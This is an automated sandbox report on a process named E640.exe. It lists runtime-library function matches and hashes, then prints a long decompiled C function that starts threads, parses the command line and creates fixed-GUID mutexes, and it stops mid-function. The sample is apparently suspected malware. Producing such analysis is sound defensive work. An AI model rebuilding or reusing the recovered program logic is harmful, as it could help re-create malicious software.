Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4100000_E640.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$_memset_sprintf
String ID:
API String ID: 217217746-0
Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
Instruction ID: 5155f064bc76b9249eb409206d95015857bd5ef5bd745aac1de2445396f3c233
Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
Instruction Fuzzy Hash: F8514471E40209BADF21DFA1DD86FEEBB78EB04704F104169F905B61C0E7B4B5068BA4

Uniqueness

Uniqueness Score: -1.00%

Function 041C66D9 Relevance: 9.1, APIs: 6, Instructions: 100COMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 041C66DD

Part of subcall function 041259BF: __calloc_crt.LIBCMT ref: 041259E2
Part of subcall function 041259BF: __initptd.LIBCMT ref: 04125A04

__calloc_crt.LIBCMT ref: 041C6700
__get_sys_err_msg.LIBCMT ref: 041C671E
__invoke_watson.LIBCMT ref: 041C673B
__get_sys_err_msg.LIBCMT ref: 041C676D
__invoke_watson.LIBCMT ref: 041C678B

Memory Dump Source

Source File: 00000005.00000002.634264306.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4100000_E640.jbxd

Yara matches

Similarity

API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
String ID:
API String ID: 4066021419-0
Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
Instruction ID: e95b7c204048ac075ead002d28a72ab8f4fa8f69eeec9e7d6888cfd4defa42ce
Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
Instruction Fuzzy Hash: A511C431640324BBFB256B69DDC0BBA738DDF10668F00086AFE08D6640F721F91042D4

Uniqueness

Uniqueness Score: -1.00%

Function 04122AD0 Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 04122B2E
_memcpy_s.LIBCMT ref: 04122BA0
__read_nolock.LIBCMT ref: 04122BFE
__filbuf.LIBCMT ref: 04122C21
_memset.LIBCMT ref: 04122C65

Part of subcall function 04125BA8: __getptd_noexit.LIBCMT ref: 04125BA8

Memory Dump Source

Source File: 00000005.00000002.634264306.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4100000_E640.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
Instruction ID: b2a76fbbc1cc9cb5b215c56f65e45a288fba2a04e6f56437c582b906c7713e5d
Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
Instruction Fuzzy Hash: 5751B334A00325DBDB298F698AC06AE77B5AF40324F1487E9F835D62D0E775BA70CB44

Uniqueness

Uniqueness Score: -1.00%

Function 04112670 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 382COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 041126DB
_memset.LIBCMT ref: 04112A30
_memset.LIBCMT ref: 04112AC0

Strings

D, xrefs: 04112AC8

Memory Dump Source

Source File: 00000005.00000002.634264306.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4100000_E640.jbxd

Yara matches

Similarity

API ID: _memset
String ID: D
API String ID: 2102423945-2746444292
Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
Instruction ID: f0ed805fb9bb3c0488c1737517b406216d149e98829103543697b8b233d39aaa
Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
Instruction Fuzzy Hash: 6AE12971D40219AADF24DFA0DD89FEEB7B8BF04304F1441BAE509B61A0EB74AA45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0410D8B0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 228COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0410D8EA

Strings

(, xrefs: 0410DAE9
, xrefs: 0410DADB
$, xrefs: 0410DAE2

Memory Dump Source

Source File: 00000005.00000002.634264306.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4100000_E640.jbxd

Yara matches

Similarity

API ID: _memset
String ID: $$$(
API String ID: 2102423945-3551151888
Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
Instruction ID: c8e642e2fcf40d10290eb6df7ae938b8e6f0a0080de39bd9cc5f3bbc2b722883
Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
Instruction Fuzzy Hash: 0891AF71D00258DAEF20DFA0DC95BEEBBB4AF06308F1481A9D405B72D0DBB66A48CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0414FBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 0414FBF1
__CxxThrowException@8.LIBCMT ref: 0414FC06

Strings

TeM, xrefs: 0414FBFE
TeM, xrefs: 0414FBE7, 0414FBFB

Memory Dump Source

Source File: 00000005.00000002.634264306.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4100000_E640.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: TeM$TeM
API String ID: 3728558374-3870166017
Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction ID: e2452bfae182757502b6e99bef67ec1b4a730e718670f67700ca104c06fefd90
Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction Fuzzy Hash: C2D067B5D0020CBBDB00EFA5D499CDDBBB8AA04348B008466A91497241EB74A7498B98

Uniqueness

Uniqueness Score: -1.00%

Function 0410D0E0 Relevance: 6.3, APIs: 4, Instructions: 254COMMON

Download Yara Rule

APIs

Part of subcall function 0412197D: __wfsopen.LIBCMT ref: 04121988

_fgetws.LIBCMT ref: 0410D15C

Memory Dump Source

Source File: 00000005.00000002.634264306.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4100000_E640.jbxd

Yara matches

Similarity

API ID: __wfsopen_fgetws
String ID:
API String ID: 853134316-0
Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
Instruction ID: c830f08eae11e85b6352a5f756c5502d1c0838b0febc585c97283c3a19752770
Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
Instruction Fuzzy Hash: 4D91E1B1D00319ABEF20DFA4DEC47AEB7B5BF04314F144569E815A7280E7B9BA14CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0410D540 Relevance: 6.2, APIs: 4, Instructions: 240COMMON

Download Yara Rule

APIs

__except_handler4.MSVCRT ref: 0410D77E
_malloc.LIBCMT ref: 0410D7B2
_malloc.LIBCMT ref: 0410D7C1
_fprintf.LIBCMT ref: 0410D815

Memory Dump Source

Source File: 00000005.00000002.634264306.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4100000_E640.jbxd

Yara matches

Similarity

API ID: _malloc$__except_handler4_fprintf
String ID:
API String ID: 1783060780-0
Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
Instruction ID: f7090625a60737fad2801e10e7a9c9a9b5f8e98b60eac8a793ffd407587e7f3c
Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
Instruction Fuzzy Hash: 51A1AFB1C00258EBEF11EFE4DC85BDEBB70AF15308F144068D40576291E7BA6A58CBA6

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: E640.exePID: 7100, Parent PID: 7032COMMON

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	42.9%
Total number of Nodes:	455
Total number of Limit Nodes:	18

Executed Functions

Function 00419F90 Relevance: 176.6, APIs: 65, Strings: 35, Instructions: 1565
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E00419F90(void* __ebx, void* __edi, intOrPtr _a4, int _a8, int _a12, char _a16, signed int _a20, WCHAR** _a24, void* _a28, signed int _a32, intOrPtr _a36, long _a40, int _a44, int _a52, int _a56, char _a72, intOrPtr _a80, char _a84, WCHAR* _a88, struct tagMSG _a92, intOrPtr _a100, int _a104, int _a108, char _a116, char _a120, WCHAR* _a124, char _a128, int _a144, int _a148, char _a160, char _a168, int _a176, int _a180, char _a192, char _a196, char _a200, int _a212, int _a216, int _a220, char _a228, char _a232, char _a240, int _a244, int _a248, char _a252, char _a256, struct tagMSG _a260, struct tagMSG _a264, int _a272, int _a276, char _a288, int _a292, char _a320, int _a336, int _a340, char _a368, short _a376, struct _SHELLEXECUTEINFOW _a396, int _a400, WCHAR* _a408, char* _a412, WCHAR* _a416, intOrPtr _a420, intOrPtr _a424, void* _a880, char _a884, short _a968, char _a984, char _a3248, short _a3252) {
				void* _v0;
				int _v4;
				char _v8;
				WCHAR** _v12;
				short* _v16;
				long _v20;
				CHAR* _v24;
				char _v28;
				char _v32;
				char _v36;
				int _v40;
				int _v44;
				int _v48;
				int _v52;
				int _v56;
				int _v60;
				int _v64;
				int _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				void* __esi;
				void* _t525;
				void* _t526;
				void* _t528;
				int _t530;
				void* _t534;
				void* _t535;
				void* _t536;
				void* _t556;
				int _t557;
				WCHAR** _t566;
				void* _t570;
				void* _t573;
				void* _t581;
				void* _t585;
				void* _t588;
				intOrPtr* _t590;
				int _t592;
				void* _t594;
				CHAR* _t596;
				void* _t599;
				void* _t602;
				void* _t608;
				void* _t614;
				int* _t618;
				short* _t677;
				void* _t697;
				void* _t707;
				void* _t723;
				void* _t727;
				long _t728;
				long _t729;
				void* _t730;
				void* _t746;
				long _t747;
				void* _t751;
				void* _t754;
				long _t755;
				void* _t759;
				void* _t765;
				signed int _t770;
				void* _t773;
				void* _t780;
				void* _t782;
				void* _t784;
				void* _t788;
				signed int _t789;
				void* _t790;
				void* _t799;
				void* _t800;
				void* _t817;
				void* _t828;
				void* _t839;
				short* _t846;
				void* _t856;
				void* _t859;
				char* _t861;
				void* _t865;
				long _t868;
				intOrPtr* _t879;
				void* _t881;
				void* _t895;
				void* _t896;
				void* _t897;
				void* _t898;
				void* _t899;
				void* _t901;
				void* _t903;
				long _t916;
				signed int _t917;
				void* _t919;
				WCHAR** _t923;
				WCHAR** _t949;
				WCHAR* _t950;
				void* _t952;
				int* _t955;
				int* _t958;
				int* _t960;
				intOrPtr _t962;
				int _t966;
				WCHAR** _t968;
				void* _t969;
				void* _t974;
				intOrPtr* _t982;
				void* _t983;
				intOrPtr* _t986;
				void* _t987;
				WCHAR* _t989;
				signed int _t990;
				signed int _t991;
				WCHAR* _t995;
				signed int _t996;
				signed int _t997;
				WCHAR* _t1000;
				signed int _t1001;
				signed int _t1002;
				intOrPtr* _t1005;
				void* _t1006;
				char* _t1008;
				intOrPtr* _t1011;
				void* _t1012;
				char* _t1014;
				intOrPtr* _t1017;
				void* _t1018;
				char* _t1020;
				intOrPtr* _t1136;
				void* _t1137;
				short* _t1142;
				void* _t1145;
				intOrPtr _t1159;
				intOrPtr _t1161;
				intOrPtr* _t1164;
				intOrPtr* _t1167;
				short* _t1168;
				short* _t1171;
				short* _t1173;
				intOrPtr* _t1175;
				intOrPtr* _t1178;
				intOrPtr* _t1181;
				intOrPtr* _t1191;
				int _t1197;
				int _t1198;
				WCHAR* _t1199;
				short* _t1200;
				signed int _t1201;
				signed int _t1202;
				signed int _t1204;
				short* _t1205;
				signed int _t1206;
				int* _t1207;
				signed int _t1208;
				int* _t1209;
				signed int _t1210;
				int* _t1211;
				intOrPtr* _t1212;
				unsigned int _t1215;
				signed int _t1217;
				void* _t1220;
				int* _t1226;
				void* _t1227;
				int _t1230;
				short* _t1231;
				char _t1232;
				char _t1233;
				int _t1234;
				int _t1235;
				char _t1236;
				int _t1242;
				signed int _t1244;
				short* _t1245;
				long _t1248;
				void* _t1249;
				signed int _t1263;
				signed int _t1264;
				void* _t1266;
				void* _t1268;
				void* _t1269;
				short* _t1270;
				void* _t1271;
				short* _t1272;
				void* _t1273;
				void* _t1274;
				char* _t1275;
				void* _t1276;
				void* _t1277;
				char* _t1278;
				void* _t1279;
				void* _t1280;
				char* _t1281;
				void* _t1282;
				void* _t1283;
				void* _t1284;
				void* _t1285;
				void* _t1286;
				void* _t1290;
				void* _t1292;
				short* _t1294;

				_t1264 = _t1263 & 0xfffffff8;
				E0042F7C0(0x14c4);
				_push(__ebx);
				_push(__edi);
				 *0x513244 = _a4; // executed
				_t525 = E0040CF10(); // executed
				if(_t525 == 0) {
					_t526 = GetCurrentProcess();
					GetLastError();
					_t528 = SetPriorityClass(_t526, 0x80); // executed
					__eflags = _t528;
					if(__eflags == 0) {
						GetLastError();
					}
					_t1226 =  *0x529228; // 0x7dd0b8
					_a52 = 0;
					_a56 = 0;
					_t530 = E0041D3C0(__eflags, _t1226, _t1226[1],  &_a52);
					_t1159 =  *0x52922c; // 0x0
					_t974 = 0xffffffe - _t1159;
					_t1197 = _t530;
					__eflags = _t974 - 1;
					if(__eflags < 0) {
						_push("list<T> too long");
						E0044F23E(__eflags);
						goto L213;
					} else {
						 *0x52922c = _t1159 + 1;
						_t1226[1] = _t1197;
						 *( *(_t1197 + 4)) = _t1197;
						_t556 = E00419D10( &_a984);
						_t1226 =  *0x513268;
						_t557 = E0041D340(__eflags, _t1226, _t1226[1], _t556);
						_t1161 =  *0x51326c;
						_t974 = 0x1cb189 - _t1161;
						_t1198 = _t557;
						__eflags = _t974 - 1;
						if(__eflags < 0) {
							L213:
							_push("list<T> too long");
							E0044F23E(__eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t1226);
							_t1227 = _t974;
							__eflags =  *(_t1227 + 0x8dc) - 0x10;
							if( *(_t1227 + 0x8dc) >= 0x10) {
								L00422587( *((intOrPtr*)(_t1227 + 0x8c8)));
								_t1264 = _t1264 + 4;
							}
							 *(_t1227 + 0x8dc) = 0xf;
							 *(_t1227 + 0x8d8) = 0;
							 *((char*)(_t1227 + 0x8c8)) = 0;
							__eflags =  *(_t1227 + 0x8b8) - 8;
							if( *(_t1227 + 0x8b8) >= 8) {
								L00422587( *((intOrPtr*)(_t1227 + 0x8a4)));
								_t1264 = _t1264 + 4;
							}
							 *(_t1227 + 0x8b8) = 7;
							 *(_t1227 + 0x8b4) = 0;
							 *((short*)(_t1227 + 0x8a4)) = 0;
							_t534 =  *(_t1227 + 0x898);
							__eflags = _t534;
							if(_t534 != 0) {
								E00414F10(_t534,  *(_t1227 + 0x89c));
								L00422587( *(_t1227 + 0x898));
								_t1264 = _t1264 + 4;
								 *(_t1227 + 0x898) = 0;
								 *(_t1227 + 0x89c) = 0;
								 *(_t1227 + 0x8a0) = 0;
							}
							_t535 =  *(_t1227 + 0x88c);
							__eflags = _t535;
							if(_t535 != 0) {
								E00414F10(_t535,  *(_t1227 + 0x890));
								L00422587( *(_t1227 + 0x88c));
								_t1264 = _t1264 + 4;
								 *(_t1227 + 0x88c) = 0;
								 *(_t1227 + 0x890) = 0;
								 *(_t1227 + 0x894) = 0;
							}
							_t536 =  *(_t1227 + 0x880);
							__eflags = _t536;
							if(_t536 != 0) {
								E00414F10(_t536,  *(_t1227 + 0x884));
								L00422587( *(_t1227 + 0x880));
								_t1264 = _t1264 + 4;
								 *(_t1227 + 0x880) = 0;
								 *(_t1227 + 0x884) = 0;
								 *(_t1227 + 0x888) = 0;
							}
							__eflags =  *(_t1227 + 0x87c) - 8;
							if( *(_t1227 + 0x87c) >= 8) {
								L00422587( *((intOrPtr*)(_t1227 + 0x868)));
								_t1264 = _t1264 + 4;
							}
							 *(_t1227 + 0x87c) = 7;
							 *(_t1227 + 0x878) = 0;
							 *((short*)(_t1227 + 0x868)) = 0;
							__eflags =  *(_t1227 + 0x864) - 8;
							if( *(_t1227 + 0x864) >= 8) {
								L00422587( *((intOrPtr*)(_t1227 + 0x850)));
								_t1264 = _t1264 + 4;
							}
							 *(_t1227 + 0x864) = 7;
							 *(_t1227 + 0x860) = 0;
							 *((short*)(_t1227 + 0x850)) = 0;
							__eflags =  *(_t1227 + 0x84c) - 8;
							if( *(_t1227 + 0x84c) >= 8) {
								L00422587( *((intOrPtr*)(_t1227 + 0x838)));
								_t1264 = _t1264 + 4;
							}
							 *(_t1227 + 0x84c) = 7;
							 *(_t1227 + 0x848) = 0;
							 *((short*)(_t1227 + 0x838)) = 0;
							__eflags =  *(_t1227 + 0x834) - 8;
							if( *(_t1227 + 0x834) >= 8) {
								L00422587( *((intOrPtr*)(_t1227 + 0x820)));
								_t1264 = _t1264 + 4;
							}
							 *(_t1227 + 0x834) = 7;
							 *(_t1227 + 0x830) = 0;
							 *((short*)(_t1227 + 0x820)) = 0;
							__eflags =  *(_t1227 + 0x1c) - 8;
							if( *(_t1227 + 0x1c) >= 8) {
								L00422587( *((intOrPtr*)(_t1227 + 8))); // executed
							}
							 *(_t1227 + 0x1c) = 7;
							__eflags = 0;
							 *(_t1227 + 0x18) = 0;
							 *((short*)(_t1227 + 8)) = 0;
							return 0;
						} else {
							 *0x51326c = _t1161 + 1;
							_t1226[1] = _t1198;
							 *( *(_t1198 + 4)) = _t1198;
							L214();
							_a32 = 0;
							_a44 = 0;
							_t1230 =  *( *0x513268);
							_v4 = _t1230;
							_a52 = _t1230;
							E00413A90(0,  &_a128, _t1198, 0x400);
							_t1199 = _a124;
							GetModuleFileNameW(0, _t1199, 0x400);
							PathRemoveFileSpecW(_t1199);
							_push(_a72);
							_a180 = 7;
							_a176 = 0;
							_a160 = 0;
							E00418400( &_a160, _t1199, _a128);
							_t1200 = _t1230 + 0x10;
							__eflags = _t1200 -  &_a148;
							if(_t1200 !=  &_a148) {
								__eflags =  *(_t1200 + 0x14) - 8;
								if( *(_t1200 + 0x14) >= 8) {
									L00422587( *_t1200);
									_t1264 = _t1264 + 4;
								}
								__eflags = 0;
								 *(_t1200 + 0x14) = 7;
								 *(_t1200 + 0x10) = 0;
								 *_t1200 = 0;
								E004145A0(_t1200,  &_a160);
							}
							__eflags = _a180 - 8;
							if(_a180 >= 8) {
								L00422587(_a160);
								_t1264 = _t1264 + 4;
							}
							_a44 = 0;
							_t566 = CommandLineToArgvW(GetCommandLineW(),  &_a44);
							_a28 = _t566;
							lstrcpyW( &_a3252,  *_t566);
							_t1201 = 1;
							__eflags = _a36 - 1;
							if(_a36 <= 1) {
								L26:
								GlobalFree(_a28);
								__eflags =  *0x513235;
								if( *0x513235 == 0) {
									_t570 = E00412220(); // executed
									__eflags = _t570 - 1;
								} else {
									__eflags = E00412220() - 2;
								}
								if(__eflags <= 0) {
									E0040EF50(0x50fec0,  &_v12, __eflags, 0xa);
									_t949 = _v12;
									_t1266 = _t1264 + 4;
									_a148 = 0xf;
									_t1202 = 0;
									__eflags = 0;
									_a144 = 0;
									_a128 = 0;
									do {
										_t1164 =  *((intOrPtr*)(_t949 + _t1202 * 4));
										__eflags =  *_t1164;
										if( *_t1164 != 0) {
											_t982 = _t1164;
											_v12 = _t982 + 1;
											do {
												_t573 =  *_t982;
												_t982 = _t982 + 1;
												__eflags = _t573;
											} while (_t573 != 0);
											_t983 = _t982 - _v12;
											__eflags = _t983;
										} else {
											_t983 = 0;
										}
										_push(_t983);
										E00413EA0(_t949,  &_a128, _t1202, _t1230, _t1164);
										_t1202 = _t1202 + 1;
										__eflags = _t1202 - 0xa;
									} while (_t1202 < 0xa);
									__eflags = _a144 - 0x10;
									_t576 =  >=  ? _a124 :  &_a124;
									_push( >=  ? _a124 :  &_a124);
									 *(_t1230 + 0x8cc) = E00423C24();
									_a220 = 7;
									_a200 = 0;
									_a288 = 0;
									_a272 = 0;
									_a216 = 0;
									_a292 = 7;
									E00411CD0(_t949,  &_a272,  &_a200);
									_t581 = _a16;
									_t1268 = _t1266 + 8;
									_t950 = _a28;
									__eflags = _t581;
									if(_t581 != 0) {
										L59:
										 *(_t1230 + 0x8cc) = 0;
									} else {
										__eflags = _t950;
										if(_t950 != 0) {
											goto L59;
										} else {
											_a12 = 7;
											_push(0xffffffff);
											_push(0);
											_v8 = 0;
											_a8 = 0;
											E00414690(_t950,  &_v8,  &_a200);
											_t1294 = _t1268 - 0x18;
											_t1142 = _t1294;
											_push(0xffffffff);
											 *(_t1142 + 0x14) = 7;
											 *(_t1142 + 0x10) = 0;
											_push(0);
											 *_t1142 = 0;
											E00414690(_t950, _t1142,  &_v20);
											E0040D240( *(_t1230 + 0x8cc));
											_t1268 = _t1294 + 0x18;
											__eflags = _v12 - 8;
											if(_v12 >= 8) {
												L00422587(_v24);
												_t1268 = _t1268 + 4;
											}
											_t581 = _v0;
										}
									}
									__eflags =  *0x513235;
									if( *0x513235 != 0) {
										L60:
										E00411A10();
										goto L61;
									} else {
										__eflags = _t581;
										if(_t581 != 0) {
											L62:
											__eflags =  *0x513234;
											if(__eflags != 0) {
												goto L81;
											} else {
												__eflags = _t581;
												if(__eflags == 0) {
													__eflags = _t950;
													if(__eflags == 0) {
														E0040EF50(0x50ffe0,  &_v16, __eflags, 0x10);
														_t1245 = _v16;
														_t1268 = _t1268 + 4;
														_a108 = 0xf;
														_t1217 = 0;
														__eflags = 0;
														_a104 = 0;
														_a88 = _t950;
														do {
															_t1191 =  *((intOrPtr*)(_t1245 + _t1217 * 4));
															__eflags =  *_t1191;
															if( *_t1191 != 0) {
																_t1136 = _t1191;
																_t950 = _t1136 + 1;
																do {
																	_t859 =  *_t1136;
																	_t1136 = _t1136 + 1;
																	__eflags = _t859;
																} while (_t859 != 0);
																_t1137 = _t1136 - _t950;
																__eflags = _t1137;
															} else {
																_t1137 = 0;
															}
															_push(_t1137);
															E00413EA0(_t950,  &_a88, _t1217, _t1245, _t1191);
															_t1217 = _t1217 + 1;
															__eflags = _t1217 - 0x10;
														} while (_t1217 < 0x10);
														_t861 =  &_a84;
														_t1140 =  &(_v24[0x8d0]);
														__eflags =  &(_v24[0x8d0]) - _t861;
														if( &(_v24[0x8d0]) != _t861) {
															_push(0xffffffff);
															_push(0);
															E00413FF0(_t950, _t1140, _t861);
														}
														_t865 = CreateThread(0, 0x61a8000, E0041DBD0, ( *0x513268)[1] + 8, 0, 0x513258);
														__eflags = _a100 - 0x10;
														 *0x513254 = _t865;
														if(__eflags >= 0) {
															L00422587(_a80);
															_t1268 = _t1268 + 4;
														}
													}
												}
												E0040EF50(0x50fe90,  &_v16, __eflags, 0xa);
												_t1292 = _t1268 + 4;
												_t1244 = 0;
												__eflags = 0;
												do {
													_t846 = _v16;
													_a20 =  *(_t846 + _t1244 * 4);
													_t1215 = 2 + lstrlenA( *(_t846 + _t1244 * 4)) * 2;
													_t950 = E00420C62(_t950,  &_v16, _t1215, _t1215);
													E0042B420(_t950, 0, _t1215);
													_t1292 = _t1292 + 0x10;
													MultiByteToWideChar(0, 0, _a20, 0xffffffff, _t950, _t1215 >> 1);
													lstrcatW(0x513290, _t950);
													_t1244 = _t1244 + 1;
													__eflags = _t1244 - 0xa;
												} while (_t1244 < 0xa);
												__eflags = lstrlenW(0x51a7c0);
												if(__eflags <= 0) {
													E0040E760(0x513278, __eflags);
													 *0x529225 = _a16;
													 *0x529226 = _a28;
													_t856 = CreateThread(0, 0x61a8000, E0041E690, 0x513270, 0, 0x51325c);
													 *0x513260 = _t856;
													WaitForSingleObject(_t856, 0xffffffff);
												}
												 *0x513238 = CreateMutexA(0, 0, "{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}");
											}
											goto L82;
										} else {
											__eflags = _t950;
											if(_t950 != 0) {
												goto L62;
											} else {
												__eflags =  *0x513234 - _t950;
												if(__eflags != 0) {
													L81:
													 *0x513230 = CreateMutexA(0, 0, "{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}");
													L82:
													E0040EF50(0x50ff80,  &_v16, __eflags, 0xa);
													_t1231 = _v16;
													_t1269 = _t1268 + 4;
													_a340 = 0xf;
													_t1204 = 0;
													__eflags = 0;
													_a336 = 0;
													_a320 = 0;
													do {
														_t1167 =  *((intOrPtr*)(_t1231 + _t1204 * 4));
														__eflags =  *_t1167;
														if( *_t1167 != 0) {
															_t986 = _t1167;
															_t950 = _t986 + 1;
															do {
																_t585 =  *_t986;
																_t986 = _t986 + 1;
																__eflags = _t585;
															} while (_t585 != 0);
															_t987 = _t986 - _t950;
															__eflags = _t987;
														} else {
															_t987 = 0;
														}
														_push(_t987);
														E00413EA0(_t950,  &_a320, _t1204, _t1231, _t1167);
														_t1204 = _t1204 + 1;
														__eflags = _t1204 - 0xa;
													} while (_t1204 < 0xa);
													_t1270 = _t1269 - 0x18;
													_v20 = 0;
													_t1168 = _t1270;
													_t1205 =  &_v20;
													 *(_t1168 + 0x14) = 7;
													 *(_t1168 + 0x10) = 0;
													 *_t1168 = 0;
													__eflags =  *0x51a7c0;
													if( *0x51a7c0 != 0) {
														_t989 = 0x51a7c0;
														_t201 =  &(_t989[1]); // 0x51a7c2
														_t1231 = _t201;
														do {
															_t588 =  *_t989;
															_t989 =  &(_t989[1]);
															__eflags = _t588;
														} while (_t588 != 0);
														_t990 = _t989 - _t1231;
														__eflags = _t990;
														_t991 = _t990 >> 1;
													} else {
														_t991 = 0;
													}
													_push(_t991);
													E00415C10(0, _t1168, _t1205, _t1231, 0x51a7c0);
													_t590 = E00412840( &_v20, 0);
													_t1271 = _t1270 + 0x18;
													__eflags =  *((intOrPtr*)(_t590 + 0x14)) - 0x10;
													if( *((intOrPtr*)(_t590 + 0x14)) >= 0x10) {
														_t590 =  *_t590;
													}
													E00410FC0(_t590, _t1205);
													__eflags = _a4 - 0x10;
													_t1232 = _v28;
													if(_a4 >= 0x10) {
														L00422587(_v16);
														_t1271 = _t1271 + 4;
													}
													_t592 = lstrlenA(_v24);
													__eflags = _t592 - 0x20;
													if(_t592 == 0x20) {
														_t1272 = _t1271 - 0x18;
														_t1171 = _t1272;
														_t952 = 0;
														 *(_t1171 + 0x14) = 7;
														 *(_t1171 + 0x10) = 0;
														 *_t1171 = 0;
														__eflags =  *0x51a7c0;
														if( *0x51a7c0 != 0) {
															_t995 = 0x51a7c0;
															_t210 =  &(_t995[1]); // 0x51a7c2
															_t1205 = _t210;
															do {
																_t594 =  *_t995;
																_t995 =  &(_t995[1]);
																__eflags = _t594;
															} while (_t594 != 0);
															_t996 = _t995 - _t1205;
															__eflags = _t996;
															_t997 = _t996 >> 1;
														} else {
															_t997 = 0;
														}
														_push(_t997);
														E00415C10(_t952, _t1171, _t1205, _t1232, 0x51a7c0);
														_t596 = E00412840( &_v24, _t952);
														_t1273 = _t1272 + 0x18;
														__eflags = _t596[0x14] - 0x10;
														if(_t596[0x14] >= 0x10) {
															_t596 =  *_t596;
														}
														lstrcpyA(_t1232 + 0x28, _t596);
														__eflags = _v0 - 0x10;
														if(_v0 >= 0x10) {
															L00422587(_v20);
															_t1273 = _t1273 + 4;
														}
														__eflags =  *0x521cf0;
														if( *0x521cf0 != 0) {
															_t1000 = 0x521cf0;
															_t216 =  &(_t1000[1]); // 0x521cf2
															_t1173 = _t216;
															do {
																_t599 =  *_t1000;
																_t1000 =  &(_t1000[1]);
																__eflags = _t599;
															} while (_t599 != 0);
															_t1001 = _t1000 - _t1173;
															__eflags = _t1001;
															_t1002 = _t1001 >> 1;
														} else {
															_t1002 = 0;
														}
														_push(_t1002);
														E00415C10(_t952, _t1232 + 0x858, _t1205, _t1232, 0x521cf0);
														E0040EF50(0x50ffb0,  &_v36, __eflags, 0xa);
														_t1233 = _v36;
														_t1274 = _t1273 + 4;
														_a248 = 0xf;
														_t1206 = 0;
														__eflags = 0;
														_a244 = 0;
														_a228 = 0;
														do {
															_t1175 =  *((intOrPtr*)(_t1233 + _t1206 * 4));
															__eflags =  *_t1175;
															if( *_t1175 != 0) {
																_t1005 = _t1175;
																_t952 = _t1005 + 1;
																do {
																	_t602 =  *_t1005;
																	_t1005 = _t1005 + 1;
																	__eflags = _t602;
																} while (_t602 != 0);
																_t1006 = _t1005 - _t952;
																__eflags = _t1006;
															} else {
																_t1006 = 0;
															}
															_push(_t1006);
															E00413EA0(_t952,  &_a232, _t1206, _t1233, _t1175);
															_t1206 = _t1206 + 1;
															__eflags = _t1206 - 0xa;
														} while (_t1206 < 0xa);
														_t1275 = _t1274 - 0x18;
														_t1008 = _t1275;
														_push(0xffffffff);
														_push(0);
														 *(_t1008 + 0x14) = 0xf;
														 *(_t1008 + 0x10) = 0;
														 *_t1008 = 0;
